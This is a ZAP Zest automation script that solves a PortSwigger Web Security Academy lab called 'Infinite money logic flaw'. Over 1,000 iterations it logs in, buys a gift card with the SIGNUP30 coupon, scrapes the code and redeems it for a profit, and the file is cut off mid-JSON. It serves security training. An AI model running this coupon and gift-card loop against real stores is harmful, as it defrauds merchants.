{
  "about": "This is a Zest script. For more details about Zest visit https://github.com/zaproxy/zest/",
  "zestVersion": "0.8",
  "title": "Infinite_money_logice_flaw",
  "description": "",
  "prefix": "https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net",
  "type": "StandAlone",
  "parameters": {
    "tokenStart": "{{",
    "tokenEnd": "}}",
    "tokens": {},
    "elementType": "ZestVariables"
  },
  "statements": [
    {
      "set": {
        "start": 1,
        "end": 1000,
        "step": 1,
        "elementType": "ZestLoopTokenIntegerSet"
      },
      "statements": [
        {
          "url": "https://0a8a00f704899b2a835f692200e60059.web-security-academy.net/login",
          "data": "",
          "method": "GET",
          "headers": "DNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-User: ?1\r\n",
          "response": {
            "url": "https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net/login",
            "headers": "HTTP/1.1 200 OK\nContent-Type: text/html; charset\u003dutf-8\nX-Frame-Options: SAMEORIGIN\nConnection: close\nContent-Length: 3526\n\n",
            "body": "\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n    \u003chead\u003e\n        \u003clink href\u003d/resources/labheader/css/academyLabHeader.css rel\u003dstylesheet\u003e\n        \u003clink href\u003d/resources/css/labs.css rel\u003dstylesheet\u003e\n        \u003ctitle\u003eInfinite money logic flaw\u003c/title\u003e\n    \u003c/head\u003e\n    \u003cbody\u003e\n        \u003cscript src\u003d\"/resources/labheader/js/labHeader.js\"\u003e\u003c/script\u003e\n        \u003cdiv id\u003d\"academyLabHeader\"\u003e\n            \u003csection class\u003d\u0027academyLabBanner\u0027\u003e\n                \u003cdiv class\u003dcontainer\u003e\n                    \u003cdiv class\u003dlogo\u003e\u003c/div\u003e\n                        \u003cdiv class\u003dtitle-container\u003e\n                            \u003ch2\u003eInfinite money logic flaw\u003c/h2\u003e\n                            \u003ca id\u003d\u0027exploit-link\u0027 class\u003d\u0027button\u0027 target\u003d\u0027_blank\u0027 href\u003d\u0027https://exploit-0aa8004503a99bfa805a52030133006d.exploit-server.net/email\u0027\u003eEmail client\u003c/a\u003e\n                            \u003ca class\u003dlink-back href\u003d\u0027https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-infinite-money\u0027\u003e\n                                Back\u0026nbsp;to\u0026nbsp;lab\u0026nbsp;description\u0026nbsp;\n                                \u003csvg version\u003d1.1 id\u003dLayer_1 xmlns\u003d\u0027http://www.w3.org/2000/svg\u0027 xmlns:xlink\u003d\u0027http://www.w3.org/1999/xlink\u0027 x\u003d0px y\u003d0px viewBox\u003d\u00270 0 28 30\u0027 enable-background\u003d\u0027new 0 0 28 30\u0027 xml:space\u003dpreserve title\u003dback-arrow\u003e\n                                    \u003cg\u003e\n                                        \u003cpolygon points\u003d\u00271.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15\u0027\u003e\u003c/polygon\u003e\n                                        \u003cpolygon points\u003d\u002714.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15\u0027\u003e\u003c/polygon\u003e\n                                    \u003c/g\u003e\n                                \u003c/svg\u003e\n                            \u003c/a\u003e\n                        \u003c/div\u003e\n                        \u003cdiv class\u003d\u0027widgetcontainer-lab-status is-notsolved\u0027\u003e\n                            \u003cspan\u003eLAB\u003c/span\u003e\n                            \u003cp\u003eNot solved\u003c/p\u003e\n                            \u003cspan class\u003dlab-status-icon\u003e\u003c/span\u003e\n                        \u003c/div\u003e\n                    \u003c/div\u003e\n                \u003c/div\u003e\n            \u003c/section\u003e\n        \u003c/div\u003e\n        \u003cdiv theme\u003d\"\"\u003e\n            \u003csection class\u003d\"maincontainer\"\u003e\n                \u003cdiv class\u003d\"container is-page\"\u003e\n                    \u003cheader class\u003d\"navigation-header\"\u003e\n                        \u003csection class\u003d\"top-links\"\u003e\n                            \u003ca href\u003d/\u003eHome\u003c/a\u003e\u003cp\u003e|\u003c/p\u003e\n                            \u003ca href\u003d\"/my-account\"\u003eMy account\u003c/a\u003e\u003cp\u003e|\u003c/p\u003e\n                            \u003ca href\u003d/cart\u003e\n                                \u003cimg src\u003d/resources/images/cart_blue.svg /\u003e\n                            \u003c/a\u003e\n                            \u003cp\u003e0\u003c/p\u003e\n                            \u003cp\u003e|\u003c/p\u003e\n                        \u003c/section\u003e\n                    \u003c/header\u003e\n                    \u003cheader class\u003d\"notification-header\"\u003e\n                    \u003c/header\u003e\n                    \u003ch1\u003eLogin\u003c/h1\u003e\n                    \u003csection\u003e\n                        \u003cform class\u003dlogin-form method\u003dPOST action\u003d\"/login\"\u003e\n                            \u003cinput required type\u003d\"hidden\" name\u003d\"csrf\" value\u003d\"rKY2CPBxvtQ1KxqGH4vhSA7uUvVITajM\"\u003e\n                            \u003clabel\u003eUsername\u003c/label\u003e\n                            \u003cinput required type\u003dusername name\u003d\"username\" autofocus\u003e\n                            \u003clabel\u003ePassword\u003c/label\u003e\n                            \u003cinput required type\u003dpassword name\u003d\"password\"\u003e\n                            \u003cbutton class\u003dbutton type\u003dsubmit\u003e Log in \u003c/button\u003e\n                        \u003c/form\u003e\n                    \u003c/section\u003e\n                \u003c/div\u003e\n            \u003c/section\u003e\n            \u003cdiv class\u003d\"footer-wrapper\"\u003e\n            \u003c/div\u003e\n        \u003c/div\u003e\n    \u003c/body\u003e\n\u003c/html\u003e\n",
            "statusCode": 200,
            "responseTimeInMs": 174,
            "elementType": "ZestResponse"
          },
          "assertions": [
            {
              "rootExpression": {
                "code": 200,
                "not": false,
                "elementType": "ZestExpressionStatusCode"
              },
              "elementType": "ZestAssertion"
            },
            {
              "rootExpression": {
                "length": 3526,
                "approx": 1,
                "variableName": "response.body",
                "not": false,
                "elementType": "ZestExpressionLength"
              },
              "elementType": "ZestAssertion"
            }
          ],
          "followRedirects": false,
          "timestamp": 1687934456063,
          "cookies": [],
          "index": 1,
          "enabled": true,
          "elementType": "ZestRequest"
        },
        {
          "fieldDefinition": {
            "formIndex": 0,
            "fieldName": "csrf",
            "elementType": "ZestFieldDefinition"
          },
          "variableName": "csrf1",
          "index": 2,
          "enabled": true,
          "elementType": "ZestAssignFieldValue"
        },
        {
          "url": "https://0a8a00f704899b2a835f692200e60059.web-security-academy.net/login",
          "data": "csrf\u003d{{csrf1}}\u0026username\u003dwiener\u0026password\u003dpeter",
          "method": "POST",
          "headers": "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 68\r\nOrigin: https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-User: ?1\r\n",
          "response": {
            "url": "https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net/login",
            "headers": "HTTP/1.1 302 Found\nLocation: /my-account?id\u003dwiener\nSet-Cookie: session\u003dNgwWEYogYBdQRa3fSIM5nnj5Iq5ZH3wf; Secure; HttpOnly; SameSite\u003dNone\nX-Frame-Options: SAMEORIGIN\nConnection: close\nContent-Length: 0\n\n",
            "body": "",
            "statusCode": 302,
            "responseTimeInMs": 237,
            "elementType": "ZestResponse"
          },
          "assertions": [
            {
              "rootExpression": {
                "code": 302,
                "not": false,
                "elementType": "ZestExpressionStatusCode"
              },
              "elementType": "ZestAssertion"
            },
            {
              "rootExpression": {
                "length": 0,
                "approx": 1,
                "variableName": "response.body",
                "not": false,
                "elementType": "ZestExpressionLength"
              },
              "elementType": "ZestAssertion"
            }
          ],
          "followRedirects": false,
          "timestamp": 1687934473559,
          "cookies": [],
          "index": 3,
          "enabled": true,
          "elementType": "ZestRequest"
        },
        {
          "url": "https://0a8a00f704899b2a835f692200e60059.web-security-academy.net/cart",
          "data": "productId\u003d2\u0026redir\u003dPRODUCT\u0026quantity\u003d1",
          "method": "POST",
          "headers": "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 36\r\nOrigin: https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-User: ?1\r\n",
          "response": {
            "url": "https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net/cart",
            "headers": "HTTP/1.1 302 Found\nLocation: /product?productId\u003d2\nX-Frame-Options: SAMEORIGIN\nConnection: close\nContent-Length: 0\n\n",
            "body": "",
            "statusCode": 302,
            "responseTimeInMs": 260,
            "elementType": "ZestResponse"
          },
          "assertions": [
            {
              "rootExpression": {
                "code": 302,
                "not": false,
                "elementType": "ZestExpressionStatusCode"
              },
              "elementType": "ZestAssertion"
            },
            {
              "rootExpression": {
                "length": 0,
                "approx": 1,
                "variableName": "response.body",
                "not": false,
                "elementType": "ZestExpressionLength"
              },
              "elementType": "ZestAssertion"
            }
          ],
          "followRedirects": false,
          "timestamp": 1687934495626,
          "cookies": [],
          "index": 4,
          "enabled": true,
          "elementType": "ZestRequest"
        },
        {
          "url": "https://0a8a00f704899b2a835f692200e60059.web-security-academy.net/cart",
          "data": "",
          "method": "GET",
          "headers": "DNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-User: ?1\r\n",
          "response": {
            "url": "https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net/cart",
            "headers": "HTTP/1.1 200 OK\nContent-Type: text/html; charset\u003dutf-8\nX-Frame-Options: SAMEORIGIN\nConnection: close\nContent-Length: 6400\n\n",
            "body": "\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n    \u003chead\u003e\n        \u003clink href\u003d/resources/labheader/css/academyLabHeader.css rel\u003dstylesheet\u003e\n        \u003clink href\u003d/resources/css/labs.css rel\u003dstylesheet\u003e\n        \u003ctitle\u003eInfinite money logic flaw\u003c/title\u003e\n    \u003c/head\u003e\n    \u003cbody\u003e\n        \u003cscript src\u003d\"/resources/labheader/js/labHeader.js\"\u003e\u003c/script\u003e\n        \u003cdiv id\u003d\"academyLabHeader\"\u003e\n            \u003csection class\u003d\u0027academyLabBanner\u0027\u003e\n                \u003cdiv class\u003dcontainer\u003e\n                    \u003cdiv class\u003dlogo\u003e\u003c/div\u003e\n                        \u003cdiv class\u003dtitle-container\u003e\n                            \u003ch2\u003eInfinite money logic flaw\u003c/h2\u003e\n                            \u003ca id\u003d\u0027exploit-link\u0027 class\u003d\u0027button\u0027 target\u003d\u0027_blank\u0027 href\u003d\u0027https://exploit-0aa8004503a99bfa805a52030133006d.exploit-server.net/email\u0027\u003eEmail client\u003c/a\u003e\n                            \u003ca class\u003dlink-back href\u003d\u0027https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-infinite-money\u0027\u003e\n                                Back\u0026nbsp;to\u0026nbsp;lab\u0026nbsp;description\u0026nbsp;\n                                \u003csvg version\u003d1.1 id\u003dLayer_1 xmlns\u003d\u0027http://www.w3.org/2000/svg\u0027 xmlns:xlink\u003d\u0027http://www.w3.org/1999/xlink\u0027 x\u003d0px y\u003d0px viewBox\u003d\u00270 0 28 30\u0027 enable-background\u003d\u0027new 0 0 28 30\u0027 xml:space\u003dpreserve title\u003dback-arrow\u003e\n                                    \u003cg\u003e\n                                        \u003cpolygon points\u003d\u00271.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15\u0027\u003e\u003c/polygon\u003e\n                                        \u003cpolygon points\u003d\u002714.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15\u0027\u003e\u003c/polygon\u003e\n                                    \u003c/g\u003e\n                                \u003c/svg\u003e\n                            \u003c/a\u003e\n                        \u003c/div\u003e\n                        \u003cdiv class\u003d\u0027widgetcontainer-lab-status is-notsolved\u0027\u003e\n                            \u003cspan\u003eLAB\u003c/span\u003e\n                            \u003cp\u003eNot solved\u003c/p\u003e\n                            \u003cspan class\u003dlab-status-icon\u003e\u003c/span\u003e\n                        \u003c/div\u003e\n                    \u003c/div\u003e\n                \u003c/div\u003e\n            \u003c/section\u003e\n        \u003c/div\u003e\n        \u003cdiv theme\u003d\"\"\u003e\n            \u003csection class\u003d\"maincontainer\"\u003e\n                \u003cdiv class\u003d\"container is-page\"\u003e\n                    \u003cheader class\u003d\"navigation-header\"\u003e\n                        \u003cp\u003e\u003cstrong\u003eStore credit: $100.00\u003c/strong\u003e\u003c/p\u003e\n                        \u003csection class\u003d\"top-links\"\u003e\n                            \u003ca href\u003d/\u003eHome\u003c/a\u003e\u003cp\u003e|\u003c/p\u003e\n                            \u003ca href\u003d\"/my-account?id\u003dwiener\"\u003eMy account\u003c/a\u003e\u003cp\u003e|\u003c/p\u003e\n                            \u003ca href\u003d/cart\u003e\n                                \u003cimg src\u003d/resources/images/cart_blue.svg /\u003e\n                            \u003c/a\u003e\n                            \u003cp\u003e1\u003c/p\u003e\n                            \u003cp\u003e|\u003c/p\u003e\n                        \u003c/section\u003e\n                    \u003c/header\u003e\n                    \u003cheader class\u003d\"notification-header\"\u003e\n                    \u003c/header\u003e\n                    \u003cp\u003e\u003cstrong\u003eCart\u003c/strong\u003e\u003c/p\u003e\n                    \u003ctable\u003e\n                        \u003ctbody\u003e\n                            \u003ctr\u003e\n                                \u003cth\u003eName\u003c/th\u003e\n                                \u003cth\u003ePrice\u003c/th\u003e\n                                \u003cth\u003eQuantity\u003c/th\u003e\n                                \u003cth\u003e\u003c/th\u003e\n                            \u003c/tr\u003e\n                            \u003ctr\u003e\n                                \u003ctd\u003e\n                                    \u003ca href\u003d/product?productId\u003d2\u003eGift Card\u003c/a\u003e\n                                \u003c/td\u003e\n                                \u003ctd\u003e$10.00\u003c/td\u003e\n                                \u003ctd\u003e\n                                    \u003cform action\u003d/cart method\u003dPOST style\u003d\u0027display: inline\u0027\u003e\n                                        \u003cinput required type\u003dhidden name\u003dproductId value\u003d2\u003e\n                                        \u003cinput required type\u003dhidden name\u003dquantity value\u003d-1\u003e\n                                        \u003cinput required type\u003dhidden name\u003dredir value\u003dCART\u003e\n                                        \u003cbutton type\u003dsubmit class\u003dbutton style\u003d\u0027min-width: auto\u0027\u003e-\u003c/button\u003e\n                                    \u003c/form\u003e\n                                    1\n                                    \u003cform action\u003d/cart method\u003dPOST style\u003d\u0027display: inline\u0027\u003e\n                                        \u003cinput required type\u003dhidden name\u003dproductId value\u003d2\u003e\n                                        \u003cinput required type\u003dhidden name\u003dquantity value\u003d1\u003e\n                                        \u003cinput required type\u003dhidden name\u003dredir value\u003dCART\u003e\n                                        \u003cbutton type\u003dsubmit class\u003dbutton style\u003d\u0027min-width: auto\u0027\u003e+\u003c/button\u003e\n                                    \u003c/form\u003e\n                                \u003c/td\u003e\n                                \u003ctd\u003e\n                                    \u003cform action\u003d/cart method\u003dPOST style\u003d\u0027display: inline\u0027\u003e\n                                        \u003cinput required type\u003dhidden name\u003dproductId value\u003d2\u003e\n                                        \u003cinput required type\u003dhidden name\u003dquantity value\u003d-1\u003e\n                                        \u003cinput required type\u003dhidden name\u003dredir value\u003dCART\u003e\n                                        \u003cbutton type\u003dsubmit class\u003dbutton style\u003d\u0027min-width: auto\u0027\u003eRemove\u003c/button\u003e\n                                    \u003c/form\u003e\n                                \u003c/td\u003e\n                            \u003c/tr\u003e\n                        \u003c/tbody\u003e\n                    \u003c/table\u003e\n                    \u003cform class\u003dlogin-form id\u003dcoupon-form action\u003d/cart/coupon method\u003dPOST \u003e\n                        \u003clabel\u003eCoupon:\u003c/label\u003e\n                        \u003cinput required type\u003d\"hidden\" name\u003d\"csrf\" value\u003d\"yi4DjWJLkwst7AyzK770BFeKb0bJDiM8\"\u003e\n                        \u003cinput required placeholder\u003d\"Add coupon\" type\u003dtext name\u003dcoupon\u003e\n                        \u003cbutton class\u003dbutton type\u003dsubmit\u003eApply\u003c/button\u003e\n                    \u003c/form\u003e\n                    \u003ctable\u003e\n                        \u003ctbody\u003e\n                            \u003ctr\u003e\n                                \u003cth\u003eTotal:\u003c/th\u003e\n                                \u003cth\u003e$10.00\u003c/th\u003e\n                            \u003c/tr\u003e\n                        \u003c/tbody\u003e\n                    \u003c/table\u003e\n                    \u003cform class\u003dlogin-form action\u003d/cart/checkout method\u003dPOST\u003e\n                        \u003cinput required type\u003d\"hidden\" name\u003d\"csrf\" value\u003d\"yi4DjWJLkwst7AyzK770BFeKb0bJDiM8\"\u003e\n                        \u003cbutton class\u003dbutton type\u003dsubmit\u003ePlace order\u003c/button\u003e\n                    \u003c/form\u003e\n                \u003c/div\u003e\n            \u003c/section\u003e\n            \u003cdiv class\u003d\"footer-wrapper\"\u003e\n            \u003c/div\u003e\n        \u003c/div\u003e\n    \u003c/body\u003e\n\u003c/html\u003e\n",
            "statusCode": 200,
            "responseTimeInMs": 185,
            "elementType": "ZestResponse"
          },
          "assertions": [
            {
              "rootExpression": {
                "code": 200,
                "not": false,
                "elementType": "ZestExpressionStatusCode"
              },
              "elementType": "ZestAssertion"
            },
            {
              "rootExpression": {
                "length": 6400,
                "approx": 1,
                "variableName": "response.body",
                "not": false,
                "elementType": "ZestExpressionLength"
              },
              "elementType": "ZestAssertion"
            }
          ],
          "followRedirects": false,
          "timestamp": 1687934497990,
          "cookies": [],
          "index": 5,
          "enabled": true,
          "elementType": "ZestRequest"
        },
        {
          "fieldDefinition": {
            "formIndex": 3,
            "fieldName": "csrf",
            "elementType": "ZestFieldDefinition"
          },
          "variableName": "csrf2",
          "index": 6,
          "enabled": true,
          "elementType": "ZestAssignFieldValue"
        },
        {
          "fieldDefinition": {
            "formIndex": 4,
            "fieldName": "csrf",
            "elementType": "ZestFieldDefinition"
          },
          "variableName": "csrf3",
          "index": 7,
          "enabled": true,
          "elementType": "ZestAssignFieldValue"
        },
        {
          "url": "https://0a8a00f704899b2a835f692200e60059.web-security-academy.net/cart/coupon",
          "data": "csrf\u003d{{csrf3}}\u0026coupon\u003dSIGNUP30",
          "method": "POST",
          "headers": "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 53\r\nOrigin: https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-User: ?1\r\n",
          "response": {
            "url": "https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net/cart/coupon",
            "headers": "HTTP/1.1 302 Found\nLocation: /cart\nX-Frame-Options: SAMEORIGIN\nConnection: close\nContent-Length: 14\n\n",
            "body": "Coupon applied",
            "statusCode": 302,
            "responseTimeInMs": 171,
            "elementType": "ZestResponse"
          },
          "assertions": [
            {
              "rootExpression": {
                "code": 302,
                "not": false,
                "elementType": "ZestExpressionStatusCode"
              },
              "elementType": "ZestAssertion"
            },
            {
              "rootExpression": {
                "length": 14,
                "approx": 1,
                "variableName": "response.body",
                "not": false,
                "elementType": "ZestExpressionLength"
              },
              "elementType": "ZestAssertion"
            }
          ],
          "followRedirects": false,
          "timestamp": 1687934502826,
          "cookies": [],
          "index": 8,
          "enabled": true,
          "elementType": "ZestRequest"
        },
        {
          "url": "https://0a8a00f704899b2a835f692200e60059.web-security-academy.net/cart/checkout",
          "data": "csrf\u003d{{csrf3}}",
          "method": "POST",
          "headers": "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 37\r\nOrigin: https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-User: ?1\r\n",
          "response": {
            "url": "https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net/cart/checkout",
            "headers": "HTTP/1.1 303 See Other\nLocation: /cart/order-confirmation?order-confirmed\u003dtrue\nX-Frame-Options: SAMEORIGIN\nConnection: close\nContent-Length: 0\n\n",
            "body": "",
            "statusCode": 303,
            "responseTimeInMs": 166,
            "elementType": "ZestResponse"
          },
          "assertions": [
            {
              "rootExpression": {
                "code": 303,
                "not": false,
                "elementType": "ZestExpressionStatusCode"
              },
              "elementType": "ZestAssertion"
            },
            {
              "rootExpression": {
                "length": 0,
                "approx": 1,
                "variableName": "response.body",
                "not": false,
                "elementType": "ZestExpressionLength"
              },
              "elementType": "ZestAssertion"
            }
          ],
          "followRedirects": false,
          "timestamp": 1687934506126,
          "cookies": [],
          "index": 9,
          "enabled": true,
          "elementType": "ZestRequest"
        },
        {
          "url": "https://0a8a00f704899b2a835f692200e60059.web-security-academy.net/cart/order-confirmation?order-confirmed\u003dtrue",
          "data": "",
          "method": "GET",
          "headers": "DNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-User: ?1\r\n",
          "response": {
            "url": "https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net/cart/order-confirmation?order-confirmed\u003dtrue",
            "headers": "HTTP/1.1 200 OK\nContent-Type: text/html; charset\u003dutf-8\nX-Frame-Options: SAMEORIGIN\nConnection: close\nContent-Length: 4682\n\n",
            "body": "\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n    \u003chead\u003e\n        \u003clink href\u003d/resources/labheader/css/academyLabHeader.css rel\u003dstylesheet\u003e\n        \u003clink href\u003d/resources/css/labs.css rel\u003dstylesheet\u003e\n        \u003ctitle\u003eInfinite money logic flaw\u003c/title\u003e\n    \u003c/head\u003e\n    \u003cbody\u003e\n        \u003cscript src\u003d\"/resources/labheader/js/labHeader.js\"\u003e\u003c/script\u003e\n        \u003cdiv id\u003d\"academyLabHeader\"\u003e\n            \u003csection class\u003d\u0027academyLabBanner\u0027\u003e\n                \u003cdiv class\u003dcontainer\u003e\n                    \u003cdiv class\u003dlogo\u003e\u003c/div\u003e\n                        \u003cdiv class\u003dtitle-container\u003e\n                            \u003ch2\u003eInfinite money logic flaw\u003c/h2\u003e\n                            \u003ca id\u003d\u0027exploit-link\u0027 class\u003d\u0027button\u0027 target\u003d\u0027_blank\u0027 href\u003d\u0027https://exploit-0aa8004503a99bfa805a52030133006d.exploit-server.net/email\u0027\u003eEmail client\u003c/a\u003e\n                            \u003ca class\u003dlink-back href\u003d\u0027https://portswigger.net/web-security/logic-flaws/examples/lab-logic-flaws-infinite-money\u0027\u003e\n                                Back\u0026nbsp;to\u0026nbsp;lab\u0026nbsp;description\u0026nbsp;\n                                \u003csvg version\u003d1.1 id\u003dLayer_1 xmlns\u003d\u0027http://www.w3.org/2000/svg\u0027 xmlns:xlink\u003d\u0027http://www.w3.org/1999/xlink\u0027 x\u003d0px y\u003d0px viewBox\u003d\u00270 0 28 30\u0027 enable-background\u003d\u0027new 0 0 28 30\u0027 xml:space\u003dpreserve title\u003dback-arrow\u003e\n                                    \u003cg\u003e\n                                        \u003cpolygon points\u003d\u00271.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15\u0027\u003e\u003c/polygon\u003e\n                                        \u003cpolygon points\u003d\u002714.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15\u0027\u003e\u003c/polygon\u003e\n                                    \u003c/g\u003e\n                                \u003c/svg\u003e\n                            \u003c/a\u003e\n                        \u003c/div\u003e\n                        \u003cdiv class\u003d\u0027widgetcontainer-lab-status is-notsolved\u0027\u003e\n                            \u003cspan\u003eLAB\u003c/span\u003e\n                            \u003cp\u003eNot solved\u003c/p\u003e\n                            \u003cspan class\u003dlab-status-icon\u003e\u003c/span\u003e\n                        \u003c/div\u003e\n                    \u003c/div\u003e\n                \u003c/div\u003e\n            \u003c/section\u003e\n        \u003c/div\u003e\n        \u003cdiv theme\u003d\"\"\u003e\n            \u003csection class\u003d\"maincontainer\"\u003e\n                \u003cdiv class\u003d\"container is-page\"\u003e\n                    \u003cheader class\u003d\"navigation-header\"\u003e\n                        \u003cp\u003e\u003cstrong\u003eStore credit: $93.00\u003c/strong\u003e\u003c/p\u003e\n                        \u003csection class\u003d\"top-links\"\u003e\n                            \u003ca href\u003d/\u003eHome\u003c/a\u003e\u003cp\u003e|\u003c/p\u003e\n                            \u003ca href\u003d\"/my-account?id\u003dwiener\"\u003eMy account\u003c/a\u003e\u003cp\u003e|\u003c/p\u003e\n                            \u003ca href\u003d/cart\u003e\n                                \u003cimg src\u003d/resources/images/cart_blue.svg /\u003e\n                            \u003c/a\u003e\n                            \u003cp\u003e0\u003c/p\u003e\n                            \u003cp\u003e|\u003c/p\u003e\n                        \u003c/section\u003e\n                    \u003c/header\u003e\n                    \u003cheader class\u003d\"notification-header\"\u003e\n                    \u003c/header\u003e\n                    \u003cp\u003e\u003cstrong\u003eYour order is on its way!\u003c/strong\u003e\u003c/p\u003e\n                    \u003ctable\u003e\n                        \u003ctbody\u003e\n                            \u003ctr\u003e\n                                \u003cth\u003eName\u003c/th\u003e\n                                \u003cth\u003ePrice\u003c/th\u003e\n                                \u003cth\u003eQuantity\u003c/th\u003e\n                                \u003cth\u003e\u003c/th\u003e\n                            \u003c/tr\u003e\n                            \u003ctr\u003e\n                                \u003ctd\u003e\n                                    \u003ca href\u003d/product?productId\u003d2\u003eGift Card\u003c/a\u003e\n                                \u003c/td\u003e\n                                \u003ctd\u003e$10.00\u003c/td\u003e\n                                \u003ctd\u003e\n                                    1\n                                \u003c/td\u003e\n                                \u003ctd\u003e\n                                \u003c/td\u003e\n                            \u003c/tr\u003e\n                            \u003ctr\u003e\u003ctd\u003eSIGNUP30\u003c/td\u003e\u003ctd\u003e-$3.00\u003c/td\u003e\u003ctd\u003e\u003c/td\u003e\u003ctd\u003e\u003c/td\u003e\u003c/tr\u003e\n                        \u003c/tbody\u003e\n                    \u003c/table\u003e\n                    \u003ctable\u003e\n                        \u003ctbody\u003e\n                            \u003ctr\u003e\n                                \u003cth\u003eTotal:\u003c/th\u003e\n                                \u003cth\u003e$7.00\u003c/th\u003e\n                            \u003c/tr\u003e\n                        \u003c/tbody\u003e\n                    \u003c/table\u003e\n                    \u003cp\u003e\u003cstrong\u003eYou have bought the following gift cards:\u003c/strong\u003e\u003c/p\u003e\n                    \u003ctable class\u003dis-table-numbers\u003e\n                        \u003ctbody\u003e\n                            \u003ctr\u003e\n                                \u003cth\u003eCode\u003c/th\u003e\n                            \u003c/tr\u003e\n                            \u003ctr\u003e\n                                \u003ctd\u003e9q3GXW16Qr\u003c/td\u003e\n                            \u003c/tr\u003e\n                        \u003c/tbody\u003e\n                    \u003c/table\u003e\n                \u003c/div\u003e\n            \u003c/section\u003e\n            \u003cdiv class\u003d\"footer-wrapper\"\u003e\n            \u003c/div\u003e\n        \u003c/div\u003e\n    \u003c/body\u003e\n\u003c/html\u003e\n",
            "statusCode": 200,
            "responseTimeInMs": 177,
            "elementType": "ZestResponse"
          },
          "assertions": [
            {
              "rootExpression": {
                "code": 200,
                "not": false,
                "elementType": "ZestExpressionStatusCode"
              },
              "elementType": "ZestAssertion"
            },
            {
              "rootExpression": {
                "length": 4682,
                "approx": 1,
                "variableName": "response.body",
                "not": false,
                "elementType": "ZestExpressionLength"
              },
              "elementType": "ZestAssertion"
            }
          ],
          "followRedirects": false,
          "timestamp": 1687934506407,
          "cookies": [],
          "index": 10,
          "enabled": true,
          "elementType": "ZestRequest"
        },
        {
          "prefix": "\u003cth\u003eCode\u003c/th\u003e",
          "postfix": "\u003c/td\u003e",
          "location": "BODY",
          "variableName": "code",
          "index": 11,
          "enabled": true,
          "elementType": "ZestAssignStringDelimiters"
        },
        {
          "replace": " ",
          "replacement": "",
          "regex": false,
          "caseExact": false,
          "variableName": "code",
          "index": 12,
          "enabled": true,
          "elementType": "ZestAssignReplace"
        },
        {
          "replace": "\\n",
          "replacement": "",
          "regex": true,
          "caseExact": false,
          "variableName": "code",
          "index": 13,
          "enabled": true,
          "elementType": "ZestAssignReplace"
        },
        {
          "replace": "\u003ctr\u003e",
          "replacement": "",
          "regex": false,
          "caseExact": false,
          "variableName": "code",
          "index": 14,
          "enabled": true,
          "elementType": "ZestAssignReplace"
        },
        {
          "replace": "\u003c/tr\u003e",
          "replacement": "",
          "regex": false,
          "caseExact": false,
          "variableName": "code",
          "index": 15,
          "enabled": true,
          "elementType": "ZestAssignReplace"
        },
        {
          "replace": "\u003ctd\u003e",
          "replacement": "",
          "regex": false,
          "caseExact": false,
          "variableName": "code",
          "index": 16,
          "enabled": true,
          "elementType": "ZestAssignReplace"
        },
        {
          "url": "https://0a8a00f704899b2a835f692200e60059.web-security-academy.net/gift-card",
          "data": "csrf\u003d{{csrf3}}\u0026gift-card\u003d{{code}}",
          "method": "POST",
          "headers": "Content-Type: application/x-www-form-urlencoded\r\nContent-Length: 58\r\nOrigin: https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: same-origin\r\nSec-Fetch-User: ?1\r\n",
          "response": {
            "url": "https://0a6c00d803649bfe801d532b00f0003f.web-security-academy.net/gift-card",
            "headers": "HTTP/1.1 302 Found\nLocation: /my-account\nX-Frame-Options: SAMEORIGIN\nConnection: close\nContent-Length: 0\n\n",
            "body": "",
            "statusCode": 302,
            "responseTimeInMs": 183,
            "elementType": "ZestResponse"
          },
          "assertions": [
            {
              "rootExpression": {
                "code": 302,
                "not": false,
                "elementType": "ZestExpressionStatusCode"
              },
              "elementType": "ZestAssertion"
            },
            {
